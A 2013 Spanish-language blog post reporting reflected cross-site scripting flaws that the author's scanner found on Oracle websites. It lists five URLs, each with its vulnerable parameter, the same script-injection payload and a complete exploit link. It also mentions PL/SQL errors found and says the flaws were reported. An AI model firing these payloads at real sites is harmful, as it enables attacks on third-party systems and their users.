jueves, 27 de junio de 2013

Dexperia al ataque de Oracle - Cross Site Scriting.


Bueno exactamente hace un día puse en marcha mi pequeña herramienta para escanear errores Cross Site Scripting y SQLi (lamentablemente mi herramienta hasta el momento solo tiene el potencial para encontrar solo estos dos tipos de vulnerabilidades), en esta ocasión decidí probar el sitio oficial de la empresa Oracle. Bueno a continuación voy a mostrar los resultados. Por motivos solo voy a mostrar los resultados de las vulnerabilidades Cross Site Scripting.


#########################################################################################################

Url  : http://www.oracle.com/pls/db112/ranked?word=EBCDIC&partno=e22490


varible  : partno


Vector de ataque  :  "><script>alert("Sky_BlaCk - Peru")</script>


Explotando vulnerabilidad  :  http://www.oracle.com/pls/db112/ranked?word=EBCDIC&partno=%20%22%3E%3Cscript%3Ealert%28%22Sky_BlaCk%20-%20Peru%22%29%3C/script%3E


#########################################################################################################

Url  :  http://www.oracle.com/pls/db92/db92.show_toc?partno=a96167&remark=drilldown&word=installation.


Variable  :  word


Vector de ataque  :  "><script>alert("Sky_BlaCk - Peru")</script>


Explotando vulnerabilidad  :  http://www.oracle.com/pls/db92/db92.show_toc?partno=a96167&remark=drilldown&word=%20%22%3E%3Cscript%3Ealert%28%22Sky_BlaCk%20-%20Peru%20%20%22%29%3C/script%3E


#########################################################################################################

Url  :  http://www.oracle.com/pls/em40/drilldown?word=Oracle+Management+Service+%28OMS%29&book=b10363&wildcards=0&remark=glossary


Variable : remark


Vector de ataque  :  "><script>alert("Sky_BlaCk - Peru")</script>


Explotando vulnerabilidad  :  http://www.oracle.com/pls/em40/drilldown?word=Oracle+Management+Service+%28OMS%29&book=b10363&wildcards=0&remark=%22%3E%3Cscript%3Ealert%28%22Sky_BlaCk%20-%20Peru%22%29%3C/script%3E


#########################################################################################################

Url  :  http://www.oracle.com/pls/asseo1012/drilldown?word=listener.ora+file&book=b13995&wildcards=0&remark=glossary


Variable : book


Vector de ataque  :  "><script>alert("Sky_BlaCk - Peru")</script>


Explotando vulnerabilidad  :  http://www.oracle.com/pls/asseo1012/drilldown?word=listener.ora+file&book=%22%3E%3Cscript%3Ealert%28%22Sky_BlaCk%20-%20Peru%22%29%3C/script%3E&wildcards=0&remark=glossary


#########################################################################################################

Url  :  http://tahiti.oracle.com/pls/tahiti/tahiti.error_search?prefill=ORA-


Variable  :  prefill


Vector de ataque  :  "><script>alert("Sky_BlaCk - Peru")</script>


Explotando vulnerabilidad  :  http://tahiti.oracle.com/pls/tahiti/tahiti.error_search?prefill=%22%3E%3Cscript%3Ealert%28%22Sky_BlaCk%20-%20Peru%22%29%3C/script%3E


#########################################################################################################

Mi humilde herramienta mientras buscaba vulnerabilidades SQLi encontro con multiples vulnerabilidades  PL/SQL.(como la siguiente imagen)


Este tipo de errores se produce cuando intenta asignar un valor a una variable numérica, pero el valor es mayor que la variable puede manejar.



Bueno Creo que Dexperia hizo bien su trabajo....=) ...Cabe resaltar que las vulnerabilidades ya fueron reportadas y solo quedaría esperar la respuesta de dicha Empresa.

Bueno me despido y sera hasta la próxima oportunidad....Nos vemos.


Vulnerabilidades activas : 27 de Junio del 2013





No hay comentarios:

Publicar un comentario